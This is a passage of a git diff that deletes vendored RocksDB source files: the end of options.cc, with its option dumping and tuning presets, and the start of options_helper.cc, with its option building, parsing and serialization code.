-    ROCKS_LOG_HEADER(log, "         Options.max_bytes_for_level_multiplier: %f",
-                     max_bytes_for_level_multiplier);
-    for (size_t i = 0; i < max_bytes_for_level_multiplier_additional.size();
-         i++) {
-      ROCKS_LOG_HEADER(
-          log, "Options.max_bytes_for_level_multiplier_addtl[%" ROCKSDB_PRIszt
-               "]: %d",
-          i, max_bytes_for_level_multiplier_additional[i]);
-    }
-    ROCKS_LOG_HEADER(
-        log, "      Options.max_sequential_skip_in_iterations: %" PRIu64,
-        max_sequential_skip_in_iterations);
-    ROCKS_LOG_HEADER(
-        log, "                   Options.max_compaction_bytes: %" PRIu64,
-        max_compaction_bytes);
-    ROCKS_LOG_HEADER(
-        log,
-        "                       Options.arena_block_size: %" ROCKSDB_PRIszt,
-        arena_block_size);
-    ROCKS_LOG_HEADER(log,
-                     "  Options.soft_pending_compaction_bytes_limit: %" PRIu64,
-                     soft_pending_compaction_bytes_limit);
-    ROCKS_LOG_HEADER(log,
-                     "  Options.hard_pending_compaction_bytes_limit: %" PRIu64,
-                     hard_pending_compaction_bytes_limit);
-    ROCKS_LOG_HEADER(log, "      Options.rate_limit_delay_max_milliseconds: %u",
-                     rate_limit_delay_max_milliseconds);
-    ROCKS_LOG_HEADER(log, "               Options.disable_auto_compactions: %d",
-                     disable_auto_compactions);
-
-    const auto& it_compaction_style =
-        compaction_style_to_string.find(compaction_style);
-    std::string str_compaction_style;
-    if (it_compaction_style == compaction_style_to_string.end()) {
-      assert(false);
-      str_compaction_style = "unknown_" + std::to_string(compaction_style);
-    } else {
-      str_compaction_style = it_compaction_style->second;
-    }
-    ROCKS_LOG_HEADER(log,
-                     "                       Options.compaction_style: %s",
-                     str_compaction_style.c_str());
-
-    const auto& it_compaction_pri =
-        compaction_pri_to_string.find(compaction_pri);
-    std::string str_compaction_pri;
-    if (it_compaction_pri == compaction_pri_to_string.end()) {
-      assert(false);
-      str_compaction_pri = "unknown_" + std::to_string(compaction_pri);
-    } else {
-      str_compaction_pri = it_compaction_pri->second;
-    }
-    ROCKS_LOG_HEADER(log,
-                     "                         Options.compaction_pri: %s",
-                     str_compaction_pri.c_str());
-    ROCKS_LOG_HEADER(log,
-                     "Options.compaction_options_universal.size_ratio: %u",
-                     compaction_options_universal.size_ratio);
-    ROCKS_LOG_HEADER(log,
-                     "Options.compaction_options_universal.min_merge_width: %u",
-                     compaction_options_universal.min_merge_width);
-    ROCKS_LOG_HEADER(log,
-                     "Options.compaction_options_universal.max_merge_width: %u",
-                     compaction_options_universal.max_merge_width);
-    ROCKS_LOG_HEADER(
-        log,
-        "Options.compaction_options_universal."
-        "max_size_amplification_percent: %u",
-        compaction_options_universal.max_size_amplification_percent);
-    ROCKS_LOG_HEADER(
-        log,
-        "Options.compaction_options_universal.compression_size_percent: %d",
-        compaction_options_universal.compression_size_percent);
-    const auto& it_compaction_stop_style = compaction_stop_style_to_string.find(
-        compaction_options_universal.stop_style);
-    std::string str_compaction_stop_style;
-    if (it_compaction_stop_style == compaction_stop_style_to_string.end()) {
-      assert(false);
-      str_compaction_stop_style =
-          "unknown_" + std::to_string(compaction_options_universal.stop_style);
-    } else {
-      str_compaction_stop_style = it_compaction_stop_style->second;
-    }
-    ROCKS_LOG_HEADER(log,
-                     "Options.compaction_options_universal.stop_style: %s",
-                     str_compaction_stop_style.c_str());
-    ROCKS_LOG_HEADER(
-        log, "Options.compaction_options_fifo.max_table_files_size: %" PRIu64,
-        compaction_options_fifo.max_table_files_size);
-    ROCKS_LOG_HEADER(log,
-                     "Options.compaction_options_fifo.allow_compaction: %d",
-                     compaction_options_fifo.allow_compaction);
-    ROCKS_LOG_HEADER(log, "Options.compaction_options_fifo.ttl: %" PRIu64,
-                     compaction_options_fifo.ttl);
-    std::string collector_names;
-    for (const auto& collector_factory : table_properties_collector_factories) {
-      collector_names.append(collector_factory->Name());
-      collector_names.append("; ");
-    }
-    ROCKS_LOG_HEADER(
-        log, "                  Options.table_properties_collectors: %s",
-        collector_names.c_str());
-    ROCKS_LOG_HEADER(log,
-                     "                  Options.inplace_update_support: %d",
-                     inplace_update_support);
-    ROCKS_LOG_HEADER(
-        log,
-        "                Options.inplace_update_num_locks: %" ROCKSDB_PRIszt,
-        inplace_update_num_locks);
-    // TODO: easier config for bloom (maybe based on avg key/value size)
-    ROCKS_LOG_HEADER(
-        log, "              Options.memtable_prefix_bloom_size_ratio: %f",
-        memtable_prefix_bloom_size_ratio);
-
-    ROCKS_LOG_HEADER(log, "  Options.memtable_huge_page_size: %" ROCKSDB_PRIszt,
-                     memtable_huge_page_size);
-    ROCKS_LOG_HEADER(log,
-                     "                          Options.bloom_locality: %d",
-                     bloom_locality);
-
-    ROCKS_LOG_HEADER(
-        log,
-        "                   Options.max_successive_merges: %" ROCKSDB_PRIszt,
-        max_successive_merges);
-    ROCKS_LOG_HEADER(log,
-                     "               Options.optimize_filters_for_hits: %d",
-                     optimize_filters_for_hits);
-    ROCKS_LOG_HEADER(log, "               Options.paranoid_file_checks: %d",
-                     paranoid_file_checks);
-    ROCKS_LOG_HEADER(log, "               Options.force_consistency_checks: %d",
-                     force_consistency_checks);
-    ROCKS_LOG_HEADER(log, "               Options.report_bg_io_stats: %d",
-                     report_bg_io_stats);
-}  // ColumnFamilyOptions::Dump
-
-void Options::Dump(Logger* log) const {
-  DBOptions::Dump(log);
-  ColumnFamilyOptions::Dump(log);
-}   // Options::Dump
-
-void Options::DumpCFOptions(Logger* log) const {
-  ColumnFamilyOptions::Dump(log);
-}  // Options::DumpCFOptions
-
-//
-// The goal of this method is to create a configuration that
-// allows an application to write all files into L0 and
-// then do a single compaction to output all files into L1.
-Options*
-Options::PrepareForBulkLoad()
-{
-  // never slowdown ingest.
-  level0_file_num_compaction_trigger = (1<<30);
-  level0_slowdown_writes_trigger = (1<<30);
-  level0_stop_writes_trigger = (1<<30);
-  soft_pending_compaction_bytes_limit = 0;
-  hard_pending_compaction_bytes_limit = 0;
-
-  // no auto compactions please. The application should issue a
-  // manual compaction after all data is loaded into L0.
-  disable_auto_compactions = true;
-  // A manual compaction run should pick all files in L0 in
-  // a single compaction run.
-  max_compaction_bytes = (static_cast<uint64_t>(1) << 60);
-
-  // It is better to have only 2 levels, otherwise a manual
-  // compaction would compact at every possible level, thereby
-  // increasing the total time needed for compactions.
-  num_levels = 2;
-
-  // Need to allow more write buffers to allow more parallism
-  // of flushes.
-  max_write_buffer_number = 6;
-  min_write_buffer_number_to_merge = 1;
-
-  // When compaction is disabled, more parallel flush threads can
-  // help with write throughput.
-  max_background_flushes = 4;
-
-  // Prevent a memtable flush to automatically promote files
-  // to L1. This is helpful so that all files that are
-  // input to the manual compaction are all at L0.
-  max_background_compactions = 2;
-
-  // The compaction would create large files in L1.
-  target_file_size_base = 256 * 1024 * 1024;
-  return this;
-}
-
-Options* Options::OptimizeForSmallDb() {
-  ColumnFamilyOptions::OptimizeForSmallDb();
-  DBOptions::OptimizeForSmallDb();
-  return this;
-}
-
-Options* Options::OldDefaults(int rocksdb_major_version,
-                              int rocksdb_minor_version) {
-  ColumnFamilyOptions::OldDefaults(rocksdb_major_version,
-                                   rocksdb_minor_version);
-  DBOptions::OldDefaults(rocksdb_major_version, rocksdb_minor_version);
-  return this;
-}
-
-DBOptions* DBOptions::OldDefaults(int rocksdb_major_version,
-                                  int rocksdb_minor_version) {
-  if (rocksdb_major_version < 4 ||
-      (rocksdb_major_version == 4 && rocksdb_minor_version < 7)) {
-    max_file_opening_threads = 1;
-    table_cache_numshardbits = 4;
-  }
-  if (rocksdb_major_version < 5 ||
-      (rocksdb_major_version == 5 && rocksdb_minor_version < 2)) {
-    delayed_write_rate = 2 * 1024U * 1024U;
-  } else if (rocksdb_major_version < 5 ||
-             (rocksdb_major_version == 5 && rocksdb_minor_version < 6)) {
-    delayed_write_rate = 16 * 1024U * 1024U;
-  }
-  max_open_files = 5000;
-  wal_recovery_mode = WALRecoveryMode::kTolerateCorruptedTailRecords;
-  return this;
-}
-
-ColumnFamilyOptions* ColumnFamilyOptions::OldDefaults(
-    int rocksdb_major_version, int rocksdb_minor_version) {
-  if (rocksdb_major_version < 4 ||
-      (rocksdb_major_version == 4 && rocksdb_minor_version < 7)) {
-    write_buffer_size = 4 << 20;
-    target_file_size_base = 2 * 1048576;
-    max_bytes_for_level_base = 10 * 1048576;
-    soft_pending_compaction_bytes_limit = 0;
-    hard_pending_compaction_bytes_limit = 0;
-  }
-  if (rocksdb_major_version < 5) {
-    level0_stop_writes_trigger = 24;
-  } else if (rocksdb_major_version == 5 && rocksdb_minor_version < 2) {
-    level0_stop_writes_trigger = 30;
-  }
-  compaction_pri = CompactionPri::kByCompensatedSize;
-
-  return this;
-}
-
-// Optimization functions
-DBOptions* DBOptions::OptimizeForSmallDb() {
-  max_file_opening_threads = 1;
-  max_open_files = 5000;
-  return this;
-}
-
-ColumnFamilyOptions* ColumnFamilyOptions::OptimizeForSmallDb() {
-  write_buffer_size = 2 << 20;
-  target_file_size_base = 2 * 1048576;
-  max_bytes_for_level_base = 10 * 1048576;
-  soft_pending_compaction_bytes_limit = 256 * 1048576;
-  hard_pending_compaction_bytes_limit = 1073741824ul;
-  return this;
-}
-
-#ifndef ROCKSDB_LITE
-ColumnFamilyOptions* ColumnFamilyOptions::OptimizeForPointLookup(
-    uint64_t block_cache_size_mb) {
-  prefix_extractor.reset(NewNoopTransform());
-  BlockBasedTableOptions block_based_options;
-  block_based_options.index_type = BlockBasedTableOptions::kHashSearch;
-  block_based_options.filter_policy.reset(NewBloomFilterPolicy(10));
-  block_based_options.block_cache =
-      NewLRUCache(static_cast<size_t>(block_cache_size_mb * 1024 * 1024));
-  table_factory.reset(new BlockBasedTableFactory(block_based_options));
-  memtable_prefix_bloom_size_ratio = 0.02;
-  return this;
-}
-
-ColumnFamilyOptions* ColumnFamilyOptions::OptimizeLevelStyleCompaction(
-    uint64_t memtable_memory_budget) {
-  write_buffer_size = static_cast<size_t>(memtable_memory_budget / 4);
-  // merge two memtables when flushing to L0
-  min_write_buffer_number_to_merge = 2;
-  // this means we'll use 50% extra memory in the worst case, but will reduce
-  // write stalls.
-  max_write_buffer_number = 6;
-  // start flushing L0->L1 as soon as possible. each file on level0 is
-  // (memtable_memory_budget / 2). This will flush level 0 when it's bigger than
-  // memtable_memory_budget.
-  level0_file_num_compaction_trigger = 2;
-  // doesn't really matter much, but we don't want to create too many files
-  target_file_size_base = memtable_memory_budget / 8;
-  // make Level1 size equal to Level0 size, so that L0->L1 compactions are fast
-  max_bytes_for_level_base = memtable_memory_budget;
-
-  // level style compaction
-  compaction_style = kCompactionStyleLevel;
-
-  // only compress levels >= 2
-  compression_per_level.resize(num_levels);
-  for (int i = 0; i < num_levels; ++i) {
-    if (i < 2) {
-      compression_per_level[i] = kNoCompression;
-    } else {
-      compression_per_level[i] = kSnappyCompression;
-    }
-  }
-  return this;
-}
-
-ColumnFamilyOptions* ColumnFamilyOptions::OptimizeUniversalStyleCompaction(
-    uint64_t memtable_memory_budget) {
-  write_buffer_size = static_cast<size_t>(memtable_memory_budget / 4);
-  // merge two memtables when flushing to L0
-  min_write_buffer_number_to_merge = 2;
-  // this means we'll use 50% extra memory in the worst case, but will reduce
-  // write stalls.
-  max_write_buffer_number = 6;
-  // universal style compaction
-  compaction_style = kCompactionStyleUniversal;
-  compaction_options_universal.compression_size_percent = 80;
-  return this;
-}
-
-DBOptions* DBOptions::IncreaseParallelism(int total_threads) {
-  max_background_compactions = total_threads - 1;
-  max_background_flushes = 1;
-  env->SetBackgroundThreads(total_threads, Env::LOW);
-  env->SetBackgroundThreads(1, Env::HIGH);
-  return this;
-}
-
-#endif  // !ROCKSDB_LITE
-
-ReadOptions::ReadOptions()
-    : snapshot(nullptr),
-      iterate_upper_bound(nullptr),
-      readahead_size(0),
-      max_skippable_internal_keys(0),
-      read_tier(kReadAllTier),
-      verify_checksums(true),
-      fill_cache(true),
-      tailing(false),
-      managed(false),
-      total_order_seek(false),
-      prefix_same_as_start(false),
-      pin_data(false),
-      background_purge_on_iterator_cleanup(false),
-      ignore_range_deletions(false) {}
-
-ReadOptions::ReadOptions(bool cksum, bool cache)
-    : snapshot(nullptr),
-      iterate_upper_bound(nullptr),
-      readahead_size(0),
-      max_skippable_internal_keys(0),
-      read_tier(kReadAllTier),
-      verify_checksums(cksum),
-      fill_cache(cache),
-      tailing(false),
-      managed(false),
-      total_order_seek(false),
-      prefix_same_as_start(false),
-      pin_data(false),
-      background_purge_on_iterator_cleanup(false),
-      ignore_range_deletions(false) {}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/options_helper.cc b/thirdparty/rocksdb/options/options_helper.cc
deleted file mode 100644
index 5cf548f..0000000
--- a/thirdparty/rocksdb/options/options_helper.cc
+++ /dev/null
@@ -1,1133 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#include "options/options_helper.h"
-
-#include <cassert>
-#include <cctype>
-#include <cstdlib>
-#include <unordered_set>
-#include <vector>
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_factory.h"
-#include "table/plain_table_factory.h"
-#include "util/cast_util.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-DBOptions BuildDBOptions(const ImmutableDBOptions& immutable_db_options,
-                         const MutableDBOptions& mutable_db_options) {
-  DBOptions options;
-
-  options.create_if_missing = immutable_db_options.create_if_missing;
-  options.create_missing_column_families =
-      immutable_db_options.create_missing_column_families;
-  options.error_if_exists = immutable_db_options.error_if_exists;
-  options.paranoid_checks = immutable_db_options.paranoid_checks;
-  options.env = immutable_db_options.env;
-  options.rate_limiter = immutable_db_options.rate_limiter;
-  options.sst_file_manager = immutable_db_options.sst_file_manager;
-  options.info_log = immutable_db_options.info_log;
-  options.info_log_level = immutable_db_options.info_log_level;
-  options.max_open_files = mutable_db_options.max_open_files;
-  options.max_file_opening_threads =
-      immutable_db_options.max_file_opening_threads;
-  options.max_total_wal_size = mutable_db_options.max_total_wal_size;
-  options.statistics = immutable_db_options.statistics;
-  options.use_fsync = immutable_db_options.use_fsync;
-  options.db_paths = immutable_db_options.db_paths;
-  options.db_log_dir = immutable_db_options.db_log_dir;
-  options.wal_dir = immutable_db_options.wal_dir;
-  options.delete_obsolete_files_period_micros =
-      mutable_db_options.delete_obsolete_files_period_micros;
-  options.max_background_jobs = mutable_db_options.max_background_jobs;
-  options.base_background_compactions =
-      mutable_db_options.base_background_compactions;
-  options.max_background_compactions =
-      mutable_db_options.max_background_compactions;
-  options.max_subcompactions = immutable_db_options.max_subcompactions;
-  options.max_background_flushes = immutable_db_options.max_background_flushes;
-  options.max_log_file_size = immutable_db_options.max_log_file_size;
-  options.log_file_time_to_roll = immutable_db_options.log_file_time_to_roll;
-  options.keep_log_file_num = immutable_db_options.keep_log_file_num;
-  options.recycle_log_file_num = immutable_db_options.recycle_log_file_num;
-  options.max_manifest_file_size = immutable_db_options.max_manifest_file_size;
-  options.table_cache_numshardbits =
-      immutable_db_options.table_cache_numshardbits;
-  options.WAL_ttl_seconds = immutable_db_options.wal_ttl_seconds;
-  options.WAL_size_limit_MB = immutable_db_options.wal_size_limit_mb;
-  options.manifest_preallocation_size =
-      immutable_db_options.manifest_preallocation_size;
-  options.allow_mmap_reads = immutable_db_options.allow_mmap_reads;
-  options.allow_mmap_writes = immutable_db_options.allow_mmap_writes;
-  options.use_direct_reads = immutable_db_options.use_direct_reads;
-  options.use_direct_io_for_flush_and_compaction =
-      immutable_db_options.use_direct_io_for_flush_and_compaction;
-  options.allow_fallocate = immutable_db_options.allow_fallocate;
-  options.is_fd_close_on_exec = immutable_db_options.is_fd_close_on_exec;
-  options.stats_dump_period_sec = mutable_db_options.stats_dump_period_sec;
-  options.advise_random_on_open = immutable_db_options.advise_random_on_open;
-  options.db_write_buffer_size = immutable_db_options.db_write_buffer_size;
-  options.write_buffer_manager = immutable_db_options.write_buffer_manager;
-  options.access_hint_on_compaction_start =
-      immutable_db_options.access_hint_on_compaction_start;
-  options.new_table_reader_for_compaction_inputs =
-      immutable_db_options.new_table_reader_for_compaction_inputs;
-  options.compaction_readahead_size =
-      immutable_db_options.compaction_readahead_size;
-  options.random_access_max_buffer_size =
-      immutable_db_options.random_access_max_buffer_size;
-  options.writable_file_max_buffer_size =
-      immutable_db_options.writable_file_max_buffer_size;
-  options.use_adaptive_mutex = immutable_db_options.use_adaptive_mutex;
-  options.bytes_per_sync = immutable_db_options.bytes_per_sync;
-  options.wal_bytes_per_sync = immutable_db_options.wal_bytes_per_sync;
-  options.listeners = immutable_db_options.listeners;
-  options.enable_thread_tracking = immutable_db_options.enable_thread_tracking;
-  options.delayed_write_rate = mutable_db_options.delayed_write_rate;
-  options.allow_concurrent_memtable_write =
-      immutable_db_options.allow_concurrent_memtable_write;
-  options.enable_write_thread_adaptive_yield =
-      immutable_db_options.enable_write_thread_adaptive_yield;
-  options.write_thread_max_yield_usec =
-      immutable_db_options.write_thread_max_yield_usec;
-  options.write_thread_slow_yield_usec =
-      immutable_db_options.write_thread_slow_yield_usec;
-  options.skip_stats_update_on_db_open =
-      immutable_db_options.skip_stats_update_on_db_open;
-  options.wal_recovery_mode = immutable_db_options.wal_recovery_mode;
-  options.allow_2pc = immutable_db_options.allow_2pc;
-  options.row_cache = immutable_db_options.row_cache;
-#ifndef ROCKSDB_LITE
-  options.wal_filter = immutable_db_options.wal_filter;
-#endif  // ROCKSDB_LITE
-  options.fail_if_options_file_error =
-      immutable_db_options.fail_if_options_file_error;
-  options.dump_malloc_stats = immutable_db_options.dump_malloc_stats;
-  options.avoid_flush_during_recovery =
-      immutable_db_options.avoid_flush_during_recovery;
-  options.avoid_flush_during_shutdown =
-      mutable_db_options.avoid_flush_during_shutdown;
-  options.allow_ingest_behind =
-      immutable_db_options.allow_ingest_behind;
-
-  return options;
-}
-
-ColumnFamilyOptions BuildColumnFamilyOptions(
-    const ColumnFamilyOptions& options,
-    const MutableCFOptions& mutable_cf_options) {
-  ColumnFamilyOptions cf_opts(options);
-
-  // Memtable related options
-  cf_opts.write_buffer_size = mutable_cf_options.write_buffer_size;
-  cf_opts.max_write_buffer_number = mutable_cf_options.max_write_buffer_number;
-  cf_opts.arena_block_size = mutable_cf_options.arena_block_size;
-  cf_opts.memtable_prefix_bloom_size_ratio =
-      mutable_cf_options.memtable_prefix_bloom_size_ratio;
-  cf_opts.memtable_huge_page_size = mutable_cf_options.memtable_huge_page_size;
-  cf_opts.max_successive_merges = mutable_cf_options.max_successive_merges;
-  cf_opts.inplace_update_num_locks =
-      mutable_cf_options.inplace_update_num_locks;
-
-  // Compaction related options
-  cf_opts.disable_auto_compactions =
-      mutable_cf_options.disable_auto_compactions;
-  cf_opts.level0_file_num_compaction_trigger =
-      mutable_cf_options.level0_file_num_compaction_trigger;
-  cf_opts.level0_slowdown_writes_trigger =
-      mutable_cf_options.level0_slowdown_writes_trigger;
-  cf_opts.level0_stop_writes_trigger =
-      mutable_cf_options.level0_stop_writes_trigger;
-  cf_opts.max_compaction_bytes = mutable_cf_options.max_compaction_bytes;
-  cf_opts.target_file_size_base = mutable_cf_options.target_file_size_base;
-  cf_opts.target_file_size_multiplier =
-      mutable_cf_options.target_file_size_multiplier;
-  cf_opts.max_bytes_for_level_base =
-      mutable_cf_options.max_bytes_for_level_base;
-  cf_opts.max_bytes_for_level_multiplier =
-      mutable_cf_options.max_bytes_for_level_multiplier;
-
-  cf_opts.max_bytes_for_level_multiplier_additional.clear();
-  for (auto value :
-       mutable_cf_options.max_bytes_for_level_multiplier_additional) {
-    cf_opts.max_bytes_for_level_multiplier_additional.emplace_back(value);
-  }
-
-  // Misc options
-  cf_opts.max_sequential_skip_in_iterations =
-      mutable_cf_options.max_sequential_skip_in_iterations;
-  cf_opts.paranoid_file_checks = mutable_cf_options.paranoid_file_checks;
-  cf_opts.report_bg_io_stats = mutable_cf_options.report_bg_io_stats;
-  cf_opts.compression = mutable_cf_options.compression;
-
-  cf_opts.table_factory = options.table_factory;
-  // TODO(yhchiang): find some way to handle the following derived options
-  // * max_file_size
-
-  return cf_opts;
-}
-
-#ifndef ROCKSDB_LITE
-
-namespace {
-template <typename T>
-bool ParseEnum(const std::unordered_map<std::string, T>& type_map,
-               const std::string& type, T* value) {
-  auto iter = type_map.find(type);
-  if (iter != type_map.end()) {
-    *value = iter->second;
-    return true;
-  }
-  return false;
-}
-
-template <typename T>
-bool SerializeEnum(const std::unordered_map<std::string, T>& type_map,
-                   const T& type, std::string* value) {
-  for (const auto& pair : type_map) {
-    if (pair.second == type) {
-      *value = pair.first;
-      return true;
-    }
-  }
-  return false;
-}
-
-bool SerializeVectorCompressionType(const std::vector<CompressionType>& types,
-                                    std::string* value) {
-  std::stringstream ss;
-  bool result;
-  for (size_t i = 0; i < types.size(); ++i) {
-    if (i > 0) {
-      ss << ':';
-    }
-    std::string string_type;
-    result = SerializeEnum<CompressionType>(compression_type_string_map,
-                                            types[i], &string_type);
-    if (result == false) {
-      return result;
-    }
-    ss << string_type;
-  }
-  *value = ss.str();
-  return true;
-}
-
-bool ParseVectorCompressionType(
-    const std::string& value,
-    std::vector<CompressionType>* compression_per_level) {
-  compression_per_level->clear();
-  size_t start = 0;
-  while (start < value.size()) {
-    size_t end = value.find(':', start);
-    bool is_ok;
-    CompressionType type;
-    if (end == std::string::npos) {
-      is_ok = ParseEnum<CompressionType>(compression_type_string_map,
-                                         value.substr(start), &type);
-      if (!is_ok) {
-        return false;
-      }
-      compression_per_level->emplace_back(type);
-      break;
-    } else {
-      is_ok = ParseEnum<CompressionType>(
-          compression_type_string_map, value.substr(start, end - start), &type);
-      if (!is_ok) {
-        return false;
-      }
-      compression_per_level->emplace_back(type);
-      start = end + 1;
-    }
-  }
-  return true;
-}
-
-bool ParseSliceTransformHelper(
-    const std::string& kFixedPrefixName, const std::string& kCappedPrefixName,
-    const std::string& value,
-    std::shared_ptr<const SliceTransform>* slice_transform) {
-
-  auto& pe_value = value;
-  if (pe_value.size() > kFixedPrefixName.size() &&
-      pe_value.compare(0, kFixedPrefixName.size(), kFixedPrefixName) == 0) {
-    int prefix_length = ParseInt(trim(value.substr(kFixedPrefixName.size())));
-    slice_transform->reset(NewFixedPrefixTransform(prefix_length));
-  } else if (pe_value.size() > kCappedPrefixName.size() &&
-             pe_value.compare(0, kCappedPrefixName.size(), kCappedPrefixName) ==
-                 0) {
-    int prefix_length =
-        ParseInt(trim(pe_value.substr(kCappedPrefixName.size())));
-    slice_transform->reset(NewCappedPrefixTransform(prefix_length));
-  } else if (value == kNullptrString) {
-    slice_transform->reset();
-  } else {
-    return false;
-  }
-
-  return true;
-}
-
-bool ParseSliceTransform(
-    const std::string& value,
-    std::shared_ptr<const SliceTransform>* slice_transform) {
-  // While we normally don't convert the string representation of a
-  // pointer-typed option into its instance, here we do so for backward
-  // compatibility as we allow this action in SetOption().
-
-  // TODO(yhchiang): A possible better place for these serialization /
-  // deserialization is inside the class definition of pointer-typed
-  // option itself, but this requires a bigger change of public API.
-  bool result =
-      ParseSliceTransformHelper("fixed:", "capped:", value, slice_transform);
-  if (result) {
-    return result;
-  }
-  result = ParseSliceTransformHelper(
-      "rocksdb.FixedPrefix.", "rocksdb.CappedPrefix.", value, slice_transform);
-  if (result) {
-    return result;
-  }
-  // TODO(yhchiang): we can further support other default
-  //                 SliceTransforms here.
-  return false;
-}
-}  // anonymouse namespace
-
-bool ParseOptionHelper(char* opt_address, const OptionType& opt_type,
-                       const std::string& value) {
-  switch (opt_type) {
-    case OptionType::kBoolean:
-      *reinterpret_cast<bool*>(opt_address) = ParseBoolean("", value);
-      break;
-    case OptionType::kInt:
-      *reinterpret_cast<int*>(opt_address) = ParseInt(value);
-      break;
-    case OptionType::kVectorInt:
-      *reinterpret_cast<std::vector<int>*>(opt_address) = ParseVectorInt(value);
-      break;
-    case OptionType::kUInt:
-      *reinterpret_cast<unsigned int*>(opt_address) = ParseUint32(value);
-      break;
-    case OptionType::kUInt32T:
-      *reinterpret_cast<uint32_t*>(opt_address) = ParseUint32(value);
-      break;
-    case OptionType::kUInt64T:
-      PutUnaligned(reinterpret_cast<uint64_t*>(opt_address), ParseUint64(value));
-      break;
-    case OptionType::kSizeT:
-      PutUnaligned(reinterpret_cast<size_t*>(opt_address), ParseSizeT(value));
-      break;
-    case OptionType::kString:
-      *reinterpret_cast<std::string*>(opt_address) = value;
-      break;
-    case OptionType::kDouble:
-      *reinterpret_cast<double*>(opt_address) = ParseDouble(value);
-      break;
-    case OptionType::kCompactionStyle:
-      return ParseEnum<CompactionStyle>(
-          compaction_style_string_map, value,
-          reinterpret_cast<CompactionStyle*>(opt_address));
-    case OptionType::kCompactionPri:
-      return ParseEnum<CompactionPri>(
-          compaction_pri_string_map, value,
-          reinterpret_cast<CompactionPri*>(opt_address));
-    case OptionType::kCompressionType:
-      return ParseEnum<CompressionType>(
-          compression_type_string_map, value,
-          reinterpret_cast<CompressionType*>(opt_address));
-    case OptionType::kVectorCompressionType:
-      return ParseVectorCompressionType(
-          value, reinterpret_cast<std::vector<CompressionType>*>(opt_address));
-    case OptionType::kSliceTransform:
-      return ParseSliceTransform(
-          value, reinterpret_cast<std::shared_ptr<const SliceTransform>*>(
-                     opt_address));
-    case OptionType::kChecksumType:
-      return ParseEnum<ChecksumType>(
-          checksum_type_string_map, value,
-          reinterpret_cast<ChecksumType*>(opt_address));
-    case OptionType::kBlockBasedTableIndexType:
-      return ParseEnum<BlockBasedTableOptions::IndexType>(
-          block_base_table_index_type_string_map, value,
-          reinterpret_cast<BlockBasedTableOptions::IndexType*>(opt_address));
-    case OptionType::kEncodingType:
-      return ParseEnum<EncodingType>(
-          encoding_type_string_map, value,
-          reinterpret_cast<EncodingType*>(opt_address));
-    case OptionType::kWALRecoveryMode:
-      return ParseEnum<WALRecoveryMode>(
-          wal_recovery_mode_string_map, value,
-          reinterpret_cast<WALRecoveryMode*>(opt_address));
-    case OptionType::kAccessHint:
-      return ParseEnum<DBOptions::AccessHint>(
-          access_hint_string_map, value,
-          reinterpret_cast<DBOptions::AccessHint*>(opt_address));
-    case OptionType::kInfoLogLevel:
-      return ParseEnum<InfoLogLevel>(
-          info_log_level_string_map, value,
-          reinterpret_cast<InfoLogLevel*>(opt_address));
-    default:
-      return false;
-  }
-  return true;
-}
-
-bool SerializeSingleOptionHelper(const char* opt_address,
-                                 const OptionType opt_type,
-                                 std::string* value) {
-
-  assert(value);
-  switch (opt_type) {
-    case OptionType::kBoolean:
-      *value = *(reinterpret_cast<const bool*>(opt_address)) ? "true" : "false";
-      break;
-    case OptionType::kInt:
-      *value = ToString(*(reinterpret_cast<const int*>(opt_address)));
-      break;
-    case OptionType::kVectorInt:
-      return SerializeIntVector(
-          *reinterpret_cast<const std::vector<int>*>(opt_address), value);
-    case OptionType::kUInt:
-      *value = ToString(*(reinterpret_cast<const unsigned int*>(opt_address)));
-      break;
-    case OptionType::kUInt32T:
-      *value = ToString(*(reinterpret_cast<const uint32_t*>(opt_address)));
-      break;
-    case OptionType::kUInt64T:
-      {
-        uint64_t v;
-        GetUnaligned(reinterpret_cast<const uint64_t*>(opt_address), &v);
-        *value = ToString(v);
-      }
-      break;
-    case OptionType::kSizeT:
-      {
-        size_t v;
-        GetUnaligned(reinterpret_cast<const size_t*>(opt_address), &v);
-        *value = ToString(v);
-      }
-      break;
-    case OptionType::kDouble:
-      *value = ToString(*(reinterpret_cast<const double*>(opt_address)));
-      break;
-    case OptionType::kString:
-      *value = EscapeOptionString(
-          *(reinterpret_cast<const std::string*>(opt_address)));
-      break;
-    case OptionType::kCompactionStyle:
-      return SerializeEnum<CompactionStyle>(
-          compaction_style_string_map,
-          *(reinterpret_cast<const CompactionStyle*>(opt_address)), value);
-    case OptionType::kCompactionPri:
-      return SerializeEnum<CompactionPri>(
-          compaction_pri_string_map,
-          *(reinterpret_cast<const CompactionPri*>(opt_address)), value);
-    case OptionType::kCompressionType:
-      return SerializeEnum<CompressionType>(
-          compression_type_string_map,
-          *(reinterpret_cast<const CompressionType*>(opt_address)), value);
-    case OptionType::kVectorCompressionType:
-      return SerializeVectorCompressionType(
-          *(reinterpret_cast<const std::vector<CompressionType>*>(opt_address)),
-          value);
-      break;
-    case OptionType::kSliceTransform: {
-      const auto* slice_transform_ptr =
-          reinterpret_cast<const std::shared_ptr<const SliceTransform>*>(
-              opt_address);
-      *value = slice_transform_ptr->get() ? slice_transform_ptr->get()->Name()
-                                          : kNullptrString;
-      break;
-    }
-    case OptionType::kTableFactory: {
-      const auto* table_factory_ptr =
-          reinterpret_cast<const std::shared_ptr<const TableFactory>*>(
-              opt_address);
-      *value = table_factory_ptr->get() ? table_factory_ptr->get()->Name()
-                                        : kNullptrString;
-      break;
-    }
-    case OptionType::kComparator: {
-      // it's a const pointer of const Comparator*
-      const auto* ptr = reinterpret_cast<const Comparator* const*>(opt_address);
-      // Since the user-specified comparator will be wrapped by
-      // InternalKeyComparator, we should persist the user-specified one
-      // instead of InternalKeyComparator.
-      if (*ptr == nullptr) {
-        *value = kNullptrString;
-      } else {
-        const Comparator* root_comp = (*ptr)->GetRootComparator();
-        if (root_comp == nullptr) {
-          root_comp = (*ptr);
-        }
-        *value = root_comp->Name();
-      }
-      break;
-    }
